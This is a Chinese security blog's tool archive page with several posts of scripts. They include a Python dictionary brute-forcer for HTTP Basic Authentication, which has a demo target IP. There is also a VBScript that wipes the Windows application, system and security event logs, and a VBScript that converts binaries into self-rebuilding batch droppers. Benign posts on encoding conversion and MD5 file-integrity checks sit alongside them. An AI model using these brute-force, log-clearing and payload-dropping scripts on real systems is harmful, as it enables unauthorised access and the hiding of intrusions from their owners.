存档

‘常用工具’ 分类的存档

注入漏洞利用工具模板 For PHP

2012年3月13日 3 条评论

作者:不走的钟
 
 今天有朋友在blog上问,这种漏洞存在,但究竟如何利用?(见原文)因为你提交字符后会跳转到index.php,这种注入,手入是没办法的,需要借用第三方工具或者自己写,我翻了下硬盘,N久以前写过类似的代码,扔出来大家可以参考,大家可以在这个基础上稍做修改便可使用:

阅读全文…

目录Authorization破解工具

2011年12月20日 3 条评论

Web目录下有一些文件不允许匿名访问(可以使用Tomcat、Apache、nginx等进行配制,来实现此效果),如下图:

可以使用以下代码+字典破解,运行结果如下:

主要代码如下(附件中有完整代码,仅供学习!请勿非法使用!):

#!/usr/bin/env python
#coding=utf-8
import sys
import os
import httplib2
import base64

def To_Base64(s):
    s=unicode(s)
    s=s.encode("utf-8")
    encoded = base64.b64encode(s)
    return encoded
def From_Base64(s):
    s=unicode(s)
    decoded = base64.b64decode(s)
    decoded=decoded.decode("utf-8")
    return decoded
def httpRequest(method,url,user_pass):
    if method=='get':
       h= httplib2.Http()
       res, content = h.request(url, 'GET',headers={'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:8.0.1) Gecko/20100101 Firefox/8.0.1',
       'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
       'Accept-Language' : 'zh-cn,zh;q=0.5',
       'Accept-Encoding':'gzip, deflate',
       'Accept-Charset':'GB2312,utf-8;q=0.7,*;q=0.7',
       'Proxy-Connection':'keep-alive',
       'Authorization':'Basic '+user_pass})
       startus=res.status
    elif method=='post':
        startus=''
#    print startus
    return startus
################  main  #####################
print '####################################################'
print ' # '+'www.007hack.com'+'  '
print ' # '+'author:admin#007hack.com'+'  '
print ' # '+'Please input a URL'+'  '
print ' # '+'Demo url: http://222.230.17.123'+' '
print ' # '+'Username :user.txt '+'  '
print ' # '+'Password :pass.txt '+'  '
print '#####################################################'

url=raw_input('Please input a url: ')
#url='http://222.230.17.123'

username=open('user.txt','r')
i=0
for username in username.readlines():
    if username!='':
        username="".join(username)
        if username[-1]=='\n':
            username=username[0:-1]
        userpass=open('pass.txt', 'r')
        for userpass in userpass.readlines():
            userpass="".join(userpass)
            if userpass[-1]=='\n':
                userpass=userpass[0:-1]
            user_pass=To_Base64(username+':'+userpass)
            startus=httpRequest('get', str(url), user_pass)
            if startus==200:
                print '####################################################'
                print '                     succeed:'+From_Base64(user_pass)
                print '####################################################'
                exit()
            else:
                i=i+1
                print str(i)+" "+username+':'+userpass

点击下载

007编码转换小工具

2011年11月17日 没有评论

        最近,多次遇到不同编码下的HEX和URLEncode,于是模仿别人界面写了一个小工具,方便编码转换,可以灵活选择编码GBK或者UTF-8,使用习惯后,你会觉得非常方便,如下图所示:

下载地址:点击下载

any2bat.vbs

2009年11月25日 没有评论
'Any2Bat.vbs by zzzEVAzzz
on error resume next
set arg=wscript.arguments
if arg.count=0 then wscript.quit
with CreateObject("ADODB.Stream")
.type=1:.open:.loadfromfile arg(0):bs=.read:l=.size:.close
end with
if err.number<>0 then wscript.quit
set fso=CreateObject("Scripting.FileSystemObject")
with fso.opentextfile(arg(0)&".bat",2,true)
if err.number<>0 then wscript.quit
.writeline "@echo bs=_>xx.vbs"
for k=1 to l step 129
.write "@echo """
.write b64b(midb(bs,k,129))
.writeline """+_>>xx.vbs"
next
.writeline "@echo """":set rs=CreateObject(""ADODB.Recordset"")>>xx.vbs"
.writeline "@echo set ado=CreateObject(""ADODB.Stream"")>>xx.vbs"
.writeline "@echo l=len(bs):ss="""":for k=1 to l step 4096:ss=ss+ub64(mid(bs,k,4096)):next:l=len(ss)>>xx.vbs"
.writeline "@echo rs.fields.append ""b"",205,l/2:rs.open:rs.addnew:rs(""b"")=ss+chrb(0):rs.update>>xx.vbs"
.writeline "@echo ado.mode=3:ado.type=1:ado.open:ado.write rs(""b"").getchunk(l/2)>>xx.vbs"
.writeline "@echo ado.savetofile """+fso.getfilename(arg(0))+""",2:ado.close>>xx.vbs"
.writeline "@echo function ub64(s):dim t(4),b(3):ub64="""":n=len(s):r=2 >>xx.vbs"
.writeline "@echo if n mod 4^<^>0 then exit function:end if:for i=1 to n step 4:for j=0 to 3 >>xx.vbs"
.writeline "@echo a=asc(mid(s,i+j,1)):if a=43 then:a=62:else if a=47 then:a=63:else if a^>47 and a^<58 then:_>>xx.vbs"
.writeline "@echo a=a+4:else if a=61 then:a=0:if r=2 then r=j-2:end if:else if a^>64 and a^<91 then:_>>xx.vbs"
.writeline "@echo a=a-65:else if a^>96 and a^<123 then:a=a-71:else:exit function:_>>xx.vbs"
.writeline "@echo end if:end if:end if:end if:end if:end if:t(j)=a:next>>xx.vbs"
.writeline "@echo b(0)=t(0)+t(1)*64 mod 256:b(1)=t(1)\4+t(2)*16 mod 256:b(2)=t(2)\16+t(3)*4 >>xx.vbs"
.writeline "@echo for j=0 to r:if b(j)^<16 then ub64=ub64+""0"":end if:ub64=ub64+hex(b(j))>>xx.vbs"
.writeline "@echo next:next:end function>>xx.vbs&&cscript.exe //nologo xx.vbs&del xx.vbs"
end with
const b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
function b64b(bin)
b64b=""
n=lenb(bin)
for i=1 to n step 3
a=ascb(midb(bin,i,1))
b64b=b64b+mid(b64,a mod 64+1,1)
if i<n then
b=ascb(midb(bin,i+1,1))
b64b=b64b+mid(b64,(a\64+b*4)mod 64+1,1)
if i+1<n then
c=ascb(midb(bin,i+2,1))
b64b=b64b+mid(b64,(b\16+c*16)mod 64+1,1)
b64b=b64b+mid(b64,c\4+1,1)
else
b64b=b64b+mid(b64,b\16+1,1)
b64b=b64b+"="
end if
else
b64b=b64b+mid(b64,a\64+1,1)
b64b=b64b+"=="
end if
next
end function
分类: 常用工具 标签:

清除Windows日志vbs脚本

2009年11月23日 没有评论
使用的WMI,清除系统日志,保存为*.vbs就可以了
strComputer= "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Backup)}!\\" & _
strComputer & "\root\cimv2")
dim mylogs(3)
mylogs(1)="application"
mylogs(2)="system"
mylogs(3)="security"
for Each logs in mylogs
Set colLogFiles=objWMIService.ExecQuery _
("Select * from Win32_NTEventLogFile where LogFileName='"&logs&"'")
For Each objLogfile in colLogFiles
objLogFile.ClearEventLog()
Next
next
分类: 常用工具 标签:

文件md5备份工具

2009年11月17日 没有评论

来 源:http://www.007hack.com/?p=251

作 者:007安全小组—-不走的钟

功能说明:网站源文件较多,很难判断自己的文件是否被篡改,  不走的钟在Md5sum For python 基础上进行了修改,增加支持子文件标记功能,文件结果保存在md5.dat中,二次的md5.dat文件可以使用diff命令比较。

#!/usr/bin/env python
#coding=gbk
import os
import sys
import hashlib
import io
import string
def wakdir(namedir):
    try:
        ls=os.listdir(namedir)
    except:
        print 'Access deny'
    else:
        for l in ls:
            temp=os.path.join(namedir,l)
            if os.path.isdir(temp):
                wakdir(temp)
            else:
                md5(temp)
               
               
def printUsage():
 print ('''Usage:  pymd5sum.py <filename>''')
 
def md5(md5file):
    m = hashlib.md5()
    file = io.FileIO(md5file,'r')
    bytes = file.read(1024)
    while(bytes != b''):
        m.update(bytes)
        bytes = file.read(1024)
    file.close()
  #md5value = ""
    md5value = m.hexdigest()
    print(md5value+"\t"+md5file)
    #dest=io.FileIO('md5'+".dat",'w')
    dest=open('md5.dat','a')
    #dest.write(md5file+'\t'+md5value+'\n')
    dest.write(md5file+'|'+md5value+'|'+'\n')
   
    dest.close()
  #dest = io.FileIO(sys.argv[1]+".CHECKSUM.md5",'w')
  #dest.write(md5value)
  #dest.close()

def main():
    if(sys.argv.__len__()==2) and (os.path.isfile(sys.argv[1])):
        md5file=sys.argv[1]
        md5(md5file)
    elif(sys.argv.__len__()==2) and (os.path.isdir(sys.argv[1])):
        wakdir(sys.argv[1])
    else:
        printUsage()
   
main()
分类: 常用工具 标签: